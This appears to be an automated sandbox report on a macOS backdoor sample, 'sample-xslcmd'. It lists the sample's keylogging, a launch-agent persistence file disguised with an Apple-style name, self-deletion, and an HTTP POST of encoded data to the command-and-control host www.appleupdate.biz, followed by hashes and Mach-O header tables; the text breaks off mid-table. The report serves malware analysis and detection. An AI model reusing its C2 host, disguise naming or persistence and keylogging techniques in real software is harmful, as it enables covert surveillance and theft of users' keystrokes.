Loading ...

Analysis Report

Overview

General Information

Analysis ID:0
Start time:22:03:15
Start date:24/09/2014
Overall analysis duration:0h 3m 22s
Report type:full
Sample file name:sample-xslcmd
Cookbook file name:keylogging.jbs
Analysis system description:Mac OS X, Lion, clean


Detection

StrategyReport FP/FN
Threshold malicious


Signature Overview


Networking:

barindex
Urls found in memory or binary dataShow sources
Source: sample-xslcmdString found in binary or memory: http://%s/%s
Source: sample-xslcmdString found in binary or memory: http://1234/config.htm
Source: sample-xslcmdString found in binary or memory: http://babelfish.yahoo.com/translate_url?doit=done&tt=url&intl=1&fr=bf-home&trurl=%s?%d&lp=en_fr&btn
Source: sample-xslcmdString found in binary or memory: http://crl.verisign.com/pca3.crl0
Source: sample-xslcmdString found in binary or memory: http://evsecure-aia.verisign.com/evsecure2006.cer0n
Source: sample-xslcmdString found in binary or memory: http://evsecure-crl.verisign.com/evsecure2006.crl0d
Source: sample-xslcmdString found in binary or memory: http://evsecure-crl.verisign.com/pca3-g5.crl0
Source: sample-xslcmdString found in binary or memory: http://evsecure-ocsp.verisign.com0
Source: sample-xslcmdString found in binary or memory: http://evsecure-ocsp.verisign.com0=
Source: sample-xslcmdString found in binary or memory: http://logo.verisign.com/vslogo.gif0)
Source: sample-xslcmdString found in binary or memory: http://logo.verisign.com/vslogo.gif04
Source: sample-xslcmdString found in binary or memory: http://logo.verisign.com/vslogo1.gif0
Source: sample-xslcmdString found in binary or memory: http://ocsp.verisign.com0
Source: sample-xslcmdString found in binary or memory: http://th
Source: sample-xslcmdString found in binary or memory: http://translate.google.com
Source: sample-xslcmdString found in binary or memory: http://translate.google.com/translate?prev=hp&hl=en&js=n&u=%s?%d&sl=es&tl=en
Source: sample-xslcmdString found in binary or memory: http://www.apple.com/dtds/propertylist-1.0.dtd
Source: sample-xslcmdString found in binary or memory: https://www.verisign.com/cps0
Source: sample-xslcmdString found in binary or memory: https://www.verisign.com/cps0=
Source: sample-xslcmdString found in binary or memory: https://www.verisign.com/rpa
Source: sample-xslcmdString found in binary or memory: https://www.verisign.com/rpa0
Found strings which match to known social media urlsShow sources
Source: sample-xslcmdString found in binary or memory: http://babelfish.yahoo.com/translate_url?doit=done&tt=url&intl=1&fr=bf-home&trurl=%s?%d&lp=en_fr&btnTrUrl=Translate equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: db._dns-sd._udp.0.50.168.192.in-addr.arpa
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST compose.aspx?s=6058ED81C06DAC84431B7823AB50C2A60B7ACD910D63AF1 HTTP/1.1 Accept: */* Referer: http://www.appleupdate.biz/windows/cartoon Accept-Language: zh-cn Accept-Encoding: gzip User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: www.appleupdate.biz Connection: Keep-Alive Content-Length: 112 Data Raw: 70 00 a7 94 af e4 fb 6f 53 78 80 00 5b f1 73 fc 68 fd b1 fd 84 ff 0d fd 87 ea 56 fd 6a f0 3f fb 7f ec 41 fc 3b f2 a3 fc 06 f1 d1 fd 36 f1 0c fc 66 f1 3c fd fa f1 f4 00 ea e5 f4 fa f4 ea f4 fb f8 f1 18 ff 20 e5 94 fd 46 f1 60 fd fa f1 f4 fd fa ea dc fd f2 f1 cc fd fa f1 f8 fd 5a f1 e4 fd b4 ff ec fd fa ef f4 ff fa f0 f0 fc f2 e8 9e fd Data Ascii: poSx[shVj?A;6f< F`Z
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)Show sources
Source: unknownDNS traffic detected: query: db._dns-sd._udp.0.50.168.192.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: r._dns-sd._udp.0.50.168.192.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: dr._dns-sd._udp.0.50.168.192.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lb._dns-sd._udp.0.50.168.192.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: b._dns-sd._udp.0.50.168.192.in-addr.arpa replaycode: Name error (3)
Uses network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 8000

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Captures keyboard strokes that are written to a log fileShow sources
Source: /Users/urugan/Library/LaunchAgents/clipboarddDetected decoy string in file: /Users/urugan/Library/Logs/BackupData/20140925_0003_50_keys.log
Source: /Applications/TextEdit.app/Contents/MacOS/TextEditDetected decoy string in file: /private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/Unsaved TextEdit Document.rtf

Persistence and Installation Behavior:

barindex
Writes property list (.plist) files to diskShow sources
Source: /Applications/Utilities/Terminal.app/Contents/MacOS/TerminalXML plist file created: /Users/urugan/Library/Preferences/com.apple.Terminal.plist.MAyXsTm
Source: /Applications/Utilities/Terminal.app/Contents/MacOS/TerminalXML plist file created: /Users/urugan/Library/Preferences/com.apple.Terminal.plist.nMuwT1L
Source: /Users/urugan/Desktop/sample-xslcmdBinary plist file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Source: /Applications/TextEdit.app/Contents/MacOS/TextEditBinary plist file created: /private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/com.apple.TextEdit.plist
Creates hidden files, links and/or directoriesShow sources
Source: /Users/urugan/Library/LaunchAgents/clipboarddHidden file created: /Users/urugan/Desktop/.got
Source: /Users/urugan/Library/LaunchAgents/clipboarddHidden file created: /Users/urugan/Documents/.got
Explicitly loads/starts launch servicesShow sources
Source: /bin/shLaunch agent/daemon loaded: launchctl load /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Writes FAT Mach-O files to diskShow sources
Source: /Users/urugan/Desktop/sample-xslcmdFile written: /Users/urugan/Library/LaunchAgents/clipboardd
Source: /usr/sbin/kextcacheFile written: /System/Library/Caches/com.apple.kext.caches/Startup/kernelcache.m11n
Writes RTF files to diskShow sources
Source: /Applications/TextEdit.app/Contents/MacOS/TextEditFile written: /private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/Unsaved TextEdit Document.rtf

Boot Survival:

barindex
Creates highly persistent launch servicesShow sources
Source: /Users/urugan/Desktop/sample-xslcmdLaunch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /Users/urugan/Desktop/sample-xslcmdBundle Info.plist file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist

Hooking and other Techniques for Hiding and Protection:

barindex
Moves itself during installation or deletes itself after installationShow sources
Source: /Applications/Utilities/Terminal.app/Contents/MacOS/TerminalFile moved: /Users/urugan/Library/Preferences/com.apple.Terminal.plist.MAyXsTm -> /Users/urugan/Library/Preferences/com.apple.Terminal.plist
Source: /Applications/Utilities/Terminal.app/Contents/MacOS/TerminalFile moved: /Users/urugan/Library/Preferences/com.apple.Terminal.plist.nMuwT1L -> /Users/urugan/Library/Preferences/com.apple.Terminal.plist
Source: /Users/urugan/Desktop/sample-xslcmdFile deleted: /Users/urugan/Desktop/sample-xslcmd
Uses network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 8000

Language, Device and Operating System Detection:

barindex
Sample file contains an Mach-O for PowerPC architecturesShow sources
Source: initial sampleStatic MACH information: PowerPC
FAT Mach-O sample file contains more than two architecturesShow sources
Source: initial sampleStatic MACH information: Mach-O fat file with 3 architectures
Queries OS software version with built-in shell commandShow sources
Source: /bin/shsw_vers executed: sw_vers -productVersion
Source: /bin/shsw_vers executed: sw_vers -productName

Stealing of Sensitive Information:

barindex
Captures keyboard strokes that are written to a log fileShow sources
Source: /Users/urugan/Library/LaunchAgents/clipboarddDetected decoy string in file: /Users/urugan/Library/Logs/BackupData/20140925_0003_50_keys.log
Source: /Applications/TextEdit.app/Contents/MacOS/TextEditDetected decoy string in file: /private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/Unsaved TextEdit Document.rtf

Yara Overview

No Yara matches

Screenshot

Startup

  • system is mac-lion
  • /Users/urugan/Library/LaunchAgents/clipboardd (PID: 241 Overlayed Process Image: /sbin/launchd MD5: 52c04ccf3d574f6697675fc8de3cc27a)
    • /bin/sh (PID: 244 MD5: 4868ba7156ac0a7f002ffebee9f7a2f9)
      • /bin/sh (PID: 245 MD5: 4868ba7156ac0a7f002ffebee9f7a2f9)
      • /usr/bin/sw_vers (PID: 245 Overlayed Process Image: /bin/sh MD5: 66d6bb0d883321ea482a0acf6ec6ea1f)
    • /bin/sh (PID: 246 MD5: 4868ba7156ac0a7f002ffebee9f7a2f9)
      • /bin/sh (PID: 247 MD5: 4868ba7156ac0a7f002ffebee9f7a2f9)
      • /usr/bin/sw_vers (PID: 247 Overlayed Process Image: /bin/sh MD5: 66d6bb0d883321ea482a0acf6ec6ea1f)
  • /usr/sbin/cupsd (PID: 259 Overlayed Process Image: /sbin/launchd MD5: d44808ca1ae55e8c2a17b84381d2fce5)
  • cleanup

Created / dropped Files

File PathType and Hashes
/System/Library/Caches/com.apple.kext.caches/Startup/kernelcache.m11n
  • Type: Mach-O fat file with 2 architectures
  • MD5: 6784D46DF16BD7D4ABC891F7D277F9A0
  • SHA: 2EB6770852DC05964FF9C591CDE4E00DE17A31C8
  • SHA-256: 95F4068C0A26D1B30FDC65F96EBF1079DE8C9D325C5A4405D705FE2E10A35518
  • SHA-512: FDAD55B057748CC4E718B25A47CCA4A7773E0E487303D535D0BFCBE3FAB54E1C94946920AF3074AF2F4454F34CFA7A09A8CF6F67C1DA674CC46517B87F809F16
/Users/urugan/.bash_history
  • Type: ASCII text
  • MD5: D33789EBDACDCB54DABF3918C704CE31
  • SHA: 49A7B2764578548599B33C74069295860EEA92BA
  • SHA-256: DE4710077B4AD73EFD7DA9A7EFA7A3D508855182F5A6129BA2AB2F4F1659ECB4
  • SHA-512: 9E560A98F81E31EE2796F4CD63E073181BD29AA45CF92981BFCA79F3B83690EFAFC44666D9BAC98DC17F33505F80E109F01EECE55EDB4E5D0611708AB6C82CFE
/Users/urugan/Library/LaunchAgents/clipboardd
  • Type: Mach-O fat file with 3 architectures
  • MD5: 60242AD3E1B6C4D417D4DFEB8FB464A1
  • SHA: 46BB20AEFD09EA0BAD534D3AA9B567D89B5AE8C4
  • SHA-256: 1DB30D5B2BB24BCC4B68D647C6A2E96D984A13A28CC5F17596B3BFE316CCA342
  • SHA-512: 68CF6CB442F0A9CDEF6E253D3C5AABD6C38D24B8676A842428AECEBB4E3637693BE9F4564A30F0736191240747A38AB18A51AE168762CA4270DADD71AB2FFE80
/Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
  • Type: XML document text
  • MD5: F53CF5BABC4537EA869265744F096D83
  • SHA: 77707980DAD9FB40F31AD96F18EF37B197A25B8B
  • SHA-256: 4E33C0B4A5AE10071E44B9AD06524354D03727D4F8700981FDE5354AAB0A0676
  • SHA-512: 3E3A4620EBEA4B7892914769D2B87C11B62D29EE9E94F172AF495CC0FD8918B538AFD70CBBB9C94476600412E2E4460F3EE832DC7097990B83A4FC87AE6726BC
/Users/urugan/Library/Logs/BackupData/20140925_0003_50_keys.log
  • Type: ASCII text, with CRLF line terminators
  • MD5: 6869C6A42FDF9596F536ED49216318D3
  • SHA: FBD788B717070C73F7E40A3800241D7C27B27385
  • SHA-256: 26C45F71D42541B496D23E5B9BD30393BE04F2B62FCBEB2D06CF6F3C055BD115
  • SHA-512: C55CC3E7148E4BBEA5BD893E0EB60AF8CDF5CC603B57C911567677514EC300E08E34F35E44D18BED095958573090AED006963407176A9A364F336355E28A14F9
/Users/urugan/Library/Preferences/com.apple.Terminal.plist.MAyXsTm
  • Type: Apple binary property list
  • MD5: 3B7331BF2DC6EB3E18D01E0FD28AFBC9
  • SHA: 12F783A60059159A3E037AA6EF69B1242BD40210
  • SHA-256: 0EB0DB74CCF6EAB0971C368D1394920024E1267D103A4BF0EE23DF54CD8AAD18
  • SHA-512: 2A0FE4225729BCBFC8FFB5AA83348A5DAC3CB1D6AC857D1D468C390F8D9C5B6E837305158D75E6F611DC5802C52CB2895C77673813BB3786246DA89B493DF330
/Users/urugan/Library/Preferences/com.apple.Terminal.plist.nMuwT1L
  • Type: Apple binary property list
  • MD5: EE3EC3014D77202A85A90AA28CB8B4C5
  • SHA: 5FD3814579241724B7135BBDC2D89216743D18D8
  • SHA-256: 2B81F25FA123035313B907E85FDE39C919E6C734DAAB80ACD9136809A02F12DB
  • SHA-512: AA7AD5107336F9AB3CACA0FE4044A560D802A59A15E09AD4B1E03E2430B36F009E95CDD93E91A409A6DC13ED782C08612D7EBB417990AE68F653F8A7DCB4757A
/dev/ptmx
  • Type: ASCII text
  • MD5: D33789EBDACDCB54DABF3918C704CE31
  • SHA: 49A7B2764578548599B33C74069295860EEA92BA
  • SHA-256: DE4710077B4AD73EFD7DA9A7EFA7A3D508855182F5A6129BA2AB2F4F1659ECB4
  • SHA-512: 9E560A98F81E31EE2796F4CD63E073181BD29AA45CF92981BFCA79F3B83690EFAFC44666D9BAC98DC17F33505F80E109F01EECE55EDB4E5D0611708AB6C82CFE
/private/etc/cups/certs/0
  • Type: ASCII text, with no line terminators
  • MD5: A1005E62F7D4202B730AED0B3C45A5D9
  • SHA: AB77AD9F62D50EBE3978CDCC17BD442D188532B1
  • SHA-256: B6201BE38E452603F9B1F8428573D00071AFDAD67DAC629BC7A679B6243DF621
  • SHA-512: B0E12F52C705FF8011732C882BB797321618E52E391881DDC8F1F4F9002865E0D3B9A38A399C1A0854578B4B4FE1A7D815C55730324C42B3272A01B13942DF88
/private/tmp/00103542e8af9
  • Type: ASCII text, with very long lines
  • MD5: 5BE4941DB87B926FBFC7FC047ED07876
  • SHA: F1DBEBE258272FE5F9399E300AE1A3EB82A8D907
  • SHA-256: EADF35D77DA90197F931C524515112C1D4B88057AE9CDCBC09292C483F6E0D97
  • SHA-512: 44DFF34AA94CECF84331AE608BBDF6F536B7887AF59BEC2FBF6BD408AD0D3DE459E8AB1055C4D1F70B887EE9A151CC85BDF2BAAC156399096286208FA6914BFE
/private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/Unsaved TextEdit Document.rtf
  • Type: Rich Text Format data, version 1, ANSI
  • MD5: F98C005C0BC0FF7C439EFFAFFD096A95
  • SHA: 02C61C074194DD60018DA3960A6B502D316431F7
  • SHA-256: BA16E0536DD76409E57E66D27C97DC86EDBCECFE604799B2DC8C5D1F4488E7B1
  • SHA-512: 708D7A0D7C77472A32B2ED47345C9C1BC76A02F38BAB0818D065B24526EECEF7DB13FD3A688B562A759CC91A5166D29075CFA4241C05A9AC93AF60B5B66041CF
/private/var/folders/6s/pncyckn14gl55c5_8kr9m_k80000gn/T/com.apple.TextEdit/TemporaryItems/(A Document Being Saved By TextEdit)/com.apple.TextEdit.plist
  • Type: XML document text
  • MD5: DD48FF3BFBA61CD2CE1386B2B7250B03
  • SHA: 88F9A36590C013724B4694EF0B77AA5E5AE28820
  • SHA-256: DE50E6E58851871F39B8BAD6E55A10342FFA508638F82B09A92E545053AE0553
  • SHA-512: 5157322F2914B08D9931648C51FD30662639B0824FFAB83145B08247D9F09A71F0BE64F8ED7AF10BE752D02D1AB345A30D9A83F2BCCCB5F8AF1B483ECAA4D722
unknown
  • Type: ASCII text, with no line terminators
  • MD5: 9AC0F4C095F70B4395B35783E7073114
  • SHA: D1CE405C01DBDDA80F4BB96878E425A4A48B8C69
  • SHA-256: CAD312F92E65CBEE48420166F3D3ED8B0D67CDE58EC3F2BF3EE894FB445C2D1A
  • SHA-512: 77934B77E0987B4774184F737508BBE9B7A6EC75C338419274676A477910F2138CF4C72BEC84E13DF0D309B570C286FA8733F315771C8C7F8856932E2D2837A6

Contacted Domains/Contacted IPs

Contacted Domains

NameIPName ServerActiveRegistrare-Mail
r._dns-sd._udp.0.50.168.192.in-addr.arpaunknownunknownunknownunknownunknown
lb._dns-sd._udp.0.50.168.192.in-addr.arpaunknownunknownunknownunknownunknown
b._dns-sd._udp.0.50.168.192.in-addr.arpaunknownunknownunknownunknownunknown
db._dns-sd._udp.0.50.168.192.in-addr.arpaunknownunknownunknownunknownunknown
dr._dns-sd._udp.0.50.168.192.in-addr.arpaunknownunknownunknownunknownunknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryPingableOpen Ports
8.8.8.8United Statesunknownunknown
61.128.110.38Chinaunknownunknown

Static File Info

General

File type:Mach-O fat file with 3 architectures
File name:sample-xslcmd
File size:345360
MD5:60242ad3e1b6c4d417d4dfeb8fb464a1
SHA1:46bb20aefd09ea0bad534d3aa9b567d89b5ae8c4
SHA256:1db30d5b2bb24bcc4b68d647c6a2e96d984a13a28cc5f17596b3bfe316cca342
SHA512:68cf6cb442f0a9cdef6e253d3c5aabd6c38d24b8676a842428aecebb4e3637693be9f4564a30f0736191240747a38ab18a51ae168762ca4270dadd71ab2ffe80

Static Mach Info

General informations for header0

Endian:>
Size:32-bit
Architecture:PowerPC
Filetype:execute
Nbr. of load commands:21
segment_command
NameValue
segname__PAGEZERO
fileoff0
maxprot0
vmsize4096
nsects0
flags0
filesize0
vmaddr0
initprot0
segment_command
NameValue
segname__TEXT
fileoff0
maxprot7
vmsize73728
nsects6
flags0
filesize73728
vmaddr4096
initprot5
Datassectname__text
segname__TEXT
reloff0
addr8952
align2
nreloc0
flags2147484672
offset4856
reserved20
reserved10
size46616
sectname__symbol_stub1
segname__TEXT
reloff0
addr55568
align2
nreloc0
flags2147484680
offset51472
reserved216
reserved10
size2016
sectname__cstring
segname__TEXT
reloff0
addr57584
align2
nreloc0
flags2
offset53488
reserved20
reserved10
size3912
sectname__const
segname__TEXT
reloff0
addr61496
align3
nreloc0
flags0
offset57400
reserved20
reserved10
size6576
sectname__gcc_except_tab
segname__TEXT
reloff0
addr68072
align2
nreloc0
flags0
offset63976
reserved20
reserved10
size4117
sectname__eh_frame
segname__TEXT
reloff0
addr72192
align2
nreloc0
flags1610612747
offset68096
reserved20
reserved10
size5628
segment_command
NameValue
segname__DATA
fileoff73728
maxprot7
vmsize24576
nsects8
flags0
filesize24576
vmaddr77824
initprot3
Datassectname__dyld
segname__DATA
reloff0
addr77824
align2
nreloc0
flags0
offset73728
reserved20
reserved10
size28
sectname__nl_symbol_ptr
segname__DATA
reloff0
addr77852
align2
nreloc0
flags6
offset73756
reserved20
reserved1126
size172
sectname__la_symbol_ptr
segname__DATA
reloff0
addr78024
align2
nreloc0
flags7
offset73928
reserved20
reserved1169
size504
sectname__const
segname__DATA
reloff0
addr78528
align2
nreloc0
flags0
offset74432
reserved20
reserved10
size36
sectname__cfstring
segname__DATA
reloff0
addr78564
align2
nreloc0
flags0
offset74468
reserved20
reserved10
size32
sectname__data
segname__DATA
reloff0
addr78596
align2
nreloc0
flags0
offset74500
reserved20
reserved10
size19748
sectname__common
segname__DATA
reloff0
addr98344
align2
nreloc0
flags1
offset0
reserved20
reserved10
size388
sectname__bss
segname__DATA
reloff0
addr98732
align2
nreloc0
flags1
offset0
reserved20
reserved10
size24
segment_command
NameValue
segname__OBJC
fileoff98304
maxprot7
vmsize4096
nsects4
flags0
filesize4096
vmaddr102400
initprot3
Datassectname__message_refs
segname__OBJC
reloff0
addr102400
align2
nreloc0
flags5
offset98304
reserved20
reserved10
size116
sectname__cls_refs
segname__OBJC
reloff0
addr102516
align2
nreloc0
flags5
offset98420
reserved20
reserved10
size48
sectname__module_info
segname__OBJC
reloff0
addr102564
align2
nreloc0
flags0
offset98468
reserved20
reserved10
size32
sectname__image_info
segname__OBJC
reloff0
addr102596
align2
nreloc0
flags0
offset98500
reserved20
reserved10
size8
segment_command
NameValue
segname__LINKEDIT
fileoff102400
maxprot7
vmsize5884
nsects0
flags0
filesize5884
vmaddr106496
initprot1
symtab_command
NameValue
strsize2824
symoff102400
stroff105460
nsyms154
dysymtab_command
NameValue
extreloff104248
nlocrel0
indirectsymoff104280
modtaboff0
nextrel4
iundefsym4
nmodtab0
ilocalsym0
nundefsym150
nextrefsyms0
locreloff0
ntoc0
nlocalsym1
tocoff0
extrefsymoff0
nindirectsyms295
iextdefsym1
nextdefsym3
dylinker_command
NameValue
name12
Data/usr/lib/dyld
uuid_command
NameValue
uuidI!2tb }#!K
dylib_command
NameValue
compatibility_version150.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version476.19.0
Data/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
dylib_command
NameValue
compatibility_version300.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version677.26.0
Data/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
dylib_command
NameValue
compatibility_version45.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version949.54.0
Data/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
dylib_command
NameValue
compatibility_version1.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version36131.0.0
Data/System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation
dylib_command
NameValue
compatibility_version1.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version212.2.0
Data/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration
dylib_command
NameValue
compatibility_version1.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version1.0.0
Data/System/Library/PrivateFrameworks/Admin.framework/Versions/A/Admin
dylib_command
NameValue
compatibility_version7.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version7.4.0
Data/usr/lib/libstdc++.6.dylib
dylib_command
NameValue
compatibility_version1.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version1.0.0
Data/usr/lib/libgcc_s.1.dylib
dylib_command
NameValue
compatibility_version1.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version111.1.4
Data/usr/lib/libSystem.B.dylib
dylib_command
NameValue
compatibility_version1.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version32.0.0
Data/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
dylib_command
NameValue
compatibility_version1.0.0
timestampThu Jan 01 01:00:02 1970
name24
current_version34.0.0
Data/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices

General informations for header1

Endian:<
Size:64-bit
Architecture:x86_64
Filetype:execute
Nbr. of load commands:22
segment_command_64
NameValue
segname__PAGEZERO
fileoff0
maxprot0
vmsize4294967296
nsects0
flags0
filesize0
vmaddr0
initprot0
segment_command_64
NameValue
segname__TEXT
fileoff0
maxprot7
vmsize77824
nsects8
flags0
filesize77824
vmaddr4294967296
initprot5
Datassectname__text
segname__TEXT
reloff0
addr4294972128
align2
nreloc0
flags2147484672
offset4832
reserved20
reserved10
reserved30
size44762
sectname__symbol_stub1
segname__TEXT
reloff0
addr4295016890
align1
nreloc0
flags2147484680
offset49594
reserved26
reserved10
reserved30
size756
sectname__cstring
segname__TEXT
reloff0
addr4295017648
align3
nreloc0
flags2
offset50352
reserved20
reserved10
reserved30
size3211
sectname__const
segname__TEXT
reloff0
addr4295020864
align5
nreloc0
flags0
offset53568
reserved20
reserved10
reserved30
size6608
sectname__stub_helper
segname__TEXT
reloff0
addr4295027472
align0
nreloc0
flags2147484672
offset60176
reserved20
reserved10
reserved30
size2278
sectname__gcc_except_tab
segname__TEXT
reloff0
addr4295029752
align2
nreloc0
flags0
offset62456
reserved20
reserved10
reserved30
size4117
sectname__unwind_info
segname__TEXT
reloff0
addr4295033872
align4
nreloc0
flags0
offset66576
reserved20
reserved10
reserved30
size836
sectname__eh_frame
segname__TEXT
reloff0
addr4295034712
align3
nreloc0
flags1610612747
offset67416
reserved20
reserved10
reserved30
size10392
segment_command_64
NameValue
segname__DATA
fileoff77824
maxprot7
vmsize24576
nsects10
flags0
filesize24576
vmaddr4295045120
initprot3
Datassectname__dyld
segname__DATA
reloff0
addr4295045120
align3
nreloc0
flags0
offset77824
reserved20
reserved10
reserved30
size56
sectname__nl_symbol_ptr
segname__DATA
reloff0
addr4295045176
align2
nreloc0
flags6
offset77880
reserved20
reserved1126
reserved30
size104
sectname__la_symbol_ptr
segname__DATA
reloff0
addr4295045280
align2
nreloc0
flags7
offset77984
reserved20
reserved1139
reserved30
size1008
sectname__const
segname__DATA
reloff0
addr4295046288
align4
nreloc0
flags0
offset78992
reserved20
reserved10
reserved30
size16
sectname__cfstring
segname__DATA
reloff0
addr4295046304
align3
nreloc0
flags0
offset79008
reserved20
reserved10
reserved30
size64
sectname__objc_msgrefs
segname__DATA
reloff0
addr4295046368
align3
nreloc0
flags0
offset79072
reserved20
reserved10
reserved30
size464
sectname__objc_classrefs
segname__DATA
reloff0
addr4295046832
align3
nreloc0
flags0
offset79536
reserved20
reserved10
reserved30
size96
sectname__objc_imageinfo
segname__DATA
reloff0
addr4295046928
align2
nreloc0
flags0
offset79632
reserved20
reserved10
reserved30
size8
sectname__data
segname__DATA
reloff0
addr4295046944
align5
nreloc0
flags0
offset79648
reserved20
reserved10
reserved30
size19920
sectname__common
segname__DATA
reloff0
addr4295066880
align5
nreloc0
flags1
offset0
reserved20
reserved10
reserved30
size480
segment_command_64
NameValue
segname__LINKEDIT
fileoff102400
maxprot7
vmsize10408
nsects0
flags0
filesize10408
vmaddr4295069696
initprot1
dyld_info_command
NameValue
lazy_bind_size2632
lazy_bind_off103464
weak_bind_size104
rebase_size0
export_off106096
export_size168
bind_off102400
rebase_off0
bind_size960
weak_bind_off103360
symtab_command
NameValue
strsize2624
symoff106264
stroff110184
nsyms156
dysymtab_command
NameValue
extreloff108760
nlocrel0
indirectsymoff109120
modtaboff0
nextrel45
iundefsym4
nmodtab0
ilocalsym0
nundefsym152
nextrefsyms0
locreloff0
ntoc0
nlocalsym1
tocoff0
extrefsymoff0
nindirectsyms265
iextdefsym1
nextdefsym3
dylinker_command
NameValue
name12
Data/usr/lib/dyld
uuid_command
NameValue
uuid]UC\ur0EH
dylib_command
NameValue
compatibility_version0.150.0
timestampThu Jan 01 01:00:02 1970
name24
current_version4864.220.1
Data/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
dylib_command
NameValue
compatibility_version0.44.1
timestampThu Jan 01 01:00:02 1970
name24
current_version6656.165.2
Data/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
dylib_command
NameValue
compatibility_version0.45.0
timestampThu Jan 01 01:00:02 1970
name24
current_version13824.181.3
Data/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.35.141
Data/System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version512.212.0
Data/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.1.0
Data/System/Library/PrivateFrameworks/Admin.framework/Versions/A/Admin
dylib_command
NameValue
compatibility_version0.7.0
timestampThu Jan 01 01:00:02 1970
name24
current_version1024.7.0
Data/usr/lib/libstdc++.6.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.1.0
Data/usr/lib/libgcc_s.1.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version260.111.0
Data/usr/lib/libSystem.B.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.227.0
Data/usr/lib/libobjc.A.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.32.0
Data/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.34.0
Data/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices

General informations for header2

Endian:<
Size:32-bit
Architecture:i386
Filetype:execute
Nbr. of load commands:23
segment_command
NameValue
segname__PAGEZERO
fileoff0
maxprot0
vmsize4096
nsects0
flags0
filesize0
vmaddr0
initprot0
segment_command
NameValue
segname__TEXT
fileoff0
maxprot7
vmsize77824
nsects8
flags0
filesize77824
vmaddr4096
initprot5
Datassectname__text
segname__TEXT
reloff0
addr11084
align2
nreloc0
flags2147484672
offset6988
reserved20
reserved10
size46717
sectname__cstring
segname__TEXT
reloff0
addr57804
align2
nreloc0
flags2
offset53708
reserved20
reserved10
size3347
sectname__const
segname__TEXT
reloff0
addr61152
align5
nreloc0
flags0
offset57056
reserved20
reserved10
size7632
sectname__symbol_stub
segname__TEXT
reloff0
addr68784
align1
nreloc0
flags2147484680
offset64688
reserved26
reserved10
size756
sectname__stub_helper
segname__TEXT
reloff0
addr69540
align0
nreloc0
flags2147484672
offset65444
reserved20
reserved10
size2028
sectname__gcc_except_tab
segname__TEXT
reloff0
addr71568
align2
nreloc0
flags0
offset67472
reserved20
reserved10
size4117
sectname__unwind_info
segname__TEXT
reloff0
addr75696
align4
nreloc0
flags0
offset71600
reserved20
reserved10
size752
sectname__eh_frame
segname__TEXT
reloff0
